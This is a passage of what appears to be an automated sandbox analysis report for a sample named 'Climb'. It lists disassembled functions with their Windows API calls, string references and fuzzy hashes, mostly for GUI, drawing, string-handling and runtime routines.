Instruction Fuzzy Hash: 21E065B151122476D72017A29C4DEEB7FBCEF56BE1F000015F909E10C0DBA18648D2B0

Function 005892BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F1F87
Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1F96
Part of subcall function 004F1F2D: BeginPath.GDI32(?), ref: 004F1FAD
Part of subcall function 004F1F2D: SelectObject.GDI32(?,00000000), ref: 004F1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005892E3
LineTo.GDI32(?,?,?), ref: 005892F0
EndPath.GDI32(?), ref: 00589300
StrokePath.GDI32(?), ref: 0058930E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: fb865ad2324b98a73113d9aac02f36a1b0d42d0bef0323ce544deef7afd0a22c
Instruction ID: c3c7d55c74ec1e32bf2652a323360f96b28c53ca23afdbdfed012b293c22e6d0
Opcode Fuzzy Hash: fb865ad2324b98a73113d9aac02f36a1b0d42d0bef0323ce544deef7afd0a22c
Instruction Fuzzy Hash: 3FF03A31005658BADB126F54AC0EFDA3FAAAF1A320F048000FE15350E1C7755565ABE9

Function 004F21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004F21BC
SetTextColor.GDI32(?,?), ref: 004F21C6
SetBkMode.GDI32(?,00000001), ref: 004F21D9
GetStockObject.GDI32(00000005), ref: 004F21E1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 339ebbf8a92ac77c6207fdce41527c439539cedaaff0bd9ad112f135a86f151f
Instruction ID: f970e9c31c998ada1687f64f9f9fc44f1ae1b3049e9f8475efee2e33bc21385b
Opcode Fuzzy Hash: 339ebbf8a92ac77c6207fdce41527c439539cedaaff0bd9ad112f135a86f151f
Instruction Fuzzy Hash: 0EE06531240640AEDB216B74AC0DBE93F61BF21335F04921AFBB5680E0C7714644EB21

Function 0054EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0054EC36
GetDC.USER32(00000000), ref: 0054EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0054EC60
ReleaseDC.USER32(?), ref: 0054EC81

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3dc995a863aa77df94dc066e2afa5ec5c8253fb270dd0a4b69690e7af1563261
Instruction ID: 278e66716214d6294b8ffb1e1ab4a1bb696130b34505f720b750c9068ad4de75
Opcode Fuzzy Hash: 3dc995a863aa77df94dc066e2afa5ec5c8253fb270dd0a4b69690e7af1563261
Instruction Fuzzy Hash: EBE0E574800208DFCB409FA19949A6DBBF1BB28311B108849E90AE3290D7395906AF20

Function 0054EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0054EC4A
GetDC.USER32(00000000), ref: 0054EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0054EC60
ReleaseDC.USER32(?), ref: 0054EC81

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 51f2f00a5e93798d5382ccae9335074a9b0503a4823f8de63e10e0e074212b2f
Instruction ID: 6d2b635f6074c9aafc6afdfd75c1a247e317acedc6712d8edacdd5df38e3f91d
Opcode Fuzzy Hash: 51f2f00a5e93798d5382ccae9335074a9b0503a4823f8de63e10e0e074212b2f
Instruction Fuzzy Hash: A0E01A74C00208DFCF409FA1D848A6DBBF1BF28311B108409E90AF3290D7395905AF20

Function 00543616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

@COM_EVENTOBJ, xrefs: 00543AD6
bnU, xrefs: 00543631, 005438EA, 00543903, 00543B3F, 00543B58

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bnU
API String ID: 2948472770-878518255
Opcode ID: c7675579f18758b7d660c73f8d0734373d6bbb41de59c557247fb65d52af9feb
Instruction ID: 9d4f6684e500a3559b69bad3dcf0392b85f61cd0fa9e2dfc065d63485f8c41b9
Opcode Fuzzy Hash: c7675579f18758b7d660c73f8d0734373d6bbb41de59c557247fb65d52af9feb
Instruction Fuzzy Hash: 88F19D70A082019FD714DF14C885BAEFBE1FF94708F54881DF58A9B2A1D775EA85CB82

Function 005785DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 005105B2: EnterCriticalSection.KERNEL32(005C170C,?,00000000,?,004FD22A,005C3570,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?), ref: 005105BD
Part of subcall function 005105B2: LeaveCriticalSection.KERNEL32(005C170C,?,004FD22A,005C3570,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?,00000001,005C2430), ref: 005105FA

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 00510413: __onexit.LIBCMT ref: 00510419

__Init_thread_footer.LIBCMT ref: 00578658

Part of subcall function 00510568: EnterCriticalSection.KERNEL32(005C170C,00000000,?,004FD258,005C3570,005327C9,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?), ref: 00510572
Part of subcall function 00510568: LeaveCriticalSection.KERNEL32(005C170C,?,004FD258,005C3570,005327C9,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?,00000001), ref: 005105A5

Strings

Variable must be of type 'Object'., xrefs: 00578697
bnU, xrefs: 005785E5, 0057887F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bnU
API String ID: 535116098-1714817190
Opcode ID: ca47ffe84346981c0c0e10052044b47799055bae47ef9064d9e314f5813ac892
Instruction ID: 7c03225c2b710268f3cac691b2d342d43537f881540a18853e1b36dd5b29e244
Opcode Fuzzy Hash: ca47ffe84346981c0c0e10052044b47799055bae47ef9064d9e314f5813ac892
Instruction Fuzzy Hash: 1F919D74A40209AFCB04EF55E899DBD7FB1FF48304F108449F90AAB292DB71AE45EB51

Function 005657CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00565919

Strings

LPT, xrefs: 00565840
*, xrefs: 00565855

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: ad4028653e8efe86add706ac21d12b291ed27723dd008f1718e3baa4e5cd556e
Instruction ID: aa3c991269f11451f687798c91776ba03e524ee1b7a9cfd4c1b524168a3e3889
Opcode Fuzzy Hash: ad4028653e8efe86add706ac21d12b291ed27723dd008f1718e3baa4e5cd556e
Instruction Fuzzy Hash: 14917C75A00604DFDB14DF94C894EAABBF1BF44318F188099E8499F362D775EE85CB90

Function 00555703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 005558AF

Strings

Container, xrefs: 0055581E
0$\, xrefs: 00555952

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ContainedObject
String ID: 0$\$Container
API String ID: 3565006973-2222120309
Opcode ID: 93ce70416c8082f05a1704f72b95440417b180a24a4b23f1dd29a63086f13643
Instruction ID: db8ef7356954f93fc50c461c8d1b571615f4b2c714d09c9cace79e2bbfd78521
Opcode Fuzzy Hash: 93ce70416c8082f05a1704f72b95440417b180a24a4b23f1dd29a63086f13643
Instruction Fuzzy Hash: 50812970600601EFDB14DF54C8A4B6ABBF9FF48711F24856EF94A8B291EBB4E845CB50

Function 0051E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0051E67D

Strings

pow, xrefs: 0051E655, 0051E672

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 2422f0235bf3764516b529cc1a8635271341bead62276deb0e5618b39f6f9d11
Instruction ID: d977450aa5a751e352abe1e2b21658366286f1630a9e06cbe4cc1c8ddf7d874b
Opcode Fuzzy Hash: 2422f0235bf3764516b529cc1a8635271341bead62276deb0e5618b39f6f9d11
Instruction Fuzzy Hash: 21518961E0A202D6E7117754FD463BA2FA0FFA1700F704D59F891422E8DF398CE9EA46

Function 0050A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0050A916

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 2c528475de98318dfe35c950f73a2d9c28d1afb19d26f417f98744474ba0a606
Instruction ID: abd7a556f5df67a267537a123882a82102fcc8a5e0c7bb397a7d6718c670954a
Opcode Fuzzy Hash: 2c528475de98318dfe35c950f73a2d9c28d1afb19d26f417f98744474ba0a606
Instruction Fuzzy Hash: 0451FE31A0434A9BDF25DF68C441AFE7FA0FF16318F64445AE9919B2D0DB349D82CB61

Function 0050F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0050F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0050F6F4

Strings

@, xrefs: 0050F6E8

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 991d09fdeef8a1de1270e3decddb69dc19ad39f71b019c0ddae49ccb87ed17cd
Instruction ID: 7a29d10f0e375ae65777b25770830452d66a96424952c2805299fea311bc098a
Opcode Fuzzy Hash: 991d09fdeef8a1de1270e3decddb69dc19ad39f71b019c0ddae49ccb87ed17cd
Instruction Fuzzy Hash: 1E5159718087489BD320AF15DC86BBFBBE8FB94304F81484EF2D9411A1DB348529CB2B

Function 00584008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 005840BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005840F8

Strings

static, xrefs: 00584058

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 5634dae545c40495d96338cf393b6e41c38ed6e258d34a96b3665dc47ec9086f
Instruction ID: 7b69cf98dc5b5882a8e9513e8d777c5978b9ed86ebed5350b79f6c1562ba05bc
Opcode Fuzzy Hash: 5634dae545c40495d96338cf393b6e41c38ed6e258d34a96b3665dc47ec9086f
Instruction Fuzzy Hash: D831AF71100605AADB10EF24CC84FBB7BA9FF98724F008619FEA5A7190DA34AC81DB60

Function 00584FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 005850BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005850D2

Strings

', xrefs: 0058502C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: edf6fb3b9a3c17dfc84c6ff52dbe11d05656d13f333c13a5178b1c60f3d5fcda
Instruction ID: 47885ddfe743d5aaa96e9948eb7ba9a97263f9cb2d26b1c8f4ca58a908fc3b4c
Opcode Fuzzy Hash: edf6fb3b9a3c17dfc84c6ff52dbe11d05656d13f333c13a5178b1c60f3d5fcda
Instruction Fuzzy Hash: 6D314674A0160ADFDB14DFA9C884BEABBB5FF09300F10406AED04AB391E771A945DF90

Function 004F20B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242

GetParent.USER32(?), ref: 00533440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 005334CA

Strings

(\, xrefs: 004F20B9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (\
API String ID: 2181805148-3685820393
Opcode ID: b48543599bbd73702a43f05ebcafd12b050839becbe800df7cd97465fdc08aee
Instruction ID: f9bb64f8bba252db364788b24cfd7688cf640537e5e776550ef7c6070288bdfa
Opcode Fuzzy Hash: b48543599bbd73702a43f05ebcafd12b050839becbe800df7cd97465fdc08aee
Instruction Fuzzy Hash: 2A218D30201148AFCF269F688A49DBA3F66EF06360F140255F7255B2E2C7B58E56E614

Function 005841AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
Part of subcall function 004F7873: GetStockObject.GDI32(00000011), ref: 004F78C5
Part of subcall function 004F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF

GetWindowRect.USER32(00000000,?), ref: 00584216
GetSysColor.USER32(00000012), ref: 00584230

Strings

static, xrefs: 005841F3

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 051e6562796fa36b7e4734505a72e8d36e52f3590873de9ef20563982716a2e3
Instruction ID: 7e3a7982063a51b580284972a7c5fd9baf63abf97fd66151b0911d3d10946bac
Opcode Fuzzy Hash: 051e6562796fa36b7e4734505a72e8d36e52f3590873de9ef20563982716a2e3
Instruction Fuzzy Hash: D811267661020AAFDB00EFA8CC45AFA7BF8FB08354F014919FD56E3250E634E851AB60

Function 0056D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0056D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0056D7EB

Strings

<local>, xrefs: 0056D7AB

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 0f63cfd85e7e3505e929a8f74f388519a04fbe9128e6d857ada78439b2a0cba7
Instruction ID: 14622eb633e203053ee46c76a397c817a40f963844c9fdae685085374c46e127
Opcode Fuzzy Hash: 0f63cfd85e7e3505e929a8f74f388519a04fbe9128e6d857ada78439b2a0cba7
Instruction Fuzzy Hash: C0110671B0123679D7344B628C85FE7BFBCFB127A4F004A26F50993180D2649844D2F1

Function 005575ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

CharUpperBuffW.USER32(?,?,?), ref: 0055761D
_wcslen.LIBCMT ref: 00557629

Strings

STOP, xrefs: 00557623, 00557628

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: b8b6efdf3bfc84d813bcab622c42e2d379d24203bd663a6da2216a3d983d064d
Instruction ID: 7486e00c3dd79a389698fb7cb99074e8281b4ee762bb22a15281d1e8f2749abb
Opcode Fuzzy Hash: b8b6efdf3bfc84d813bcab622c42e2d379d24203bd663a6da2216a3d983d064d
Instruction Fuzzy Hash: 77010432A0492F8BCB109EBDEC608BF3BB5FB68355750092AEC2193190EB34D8088690

Function 0055262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00552699

Strings

ComboBox, xrefs: 00552638
ListBox, xrefs: 00552663

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
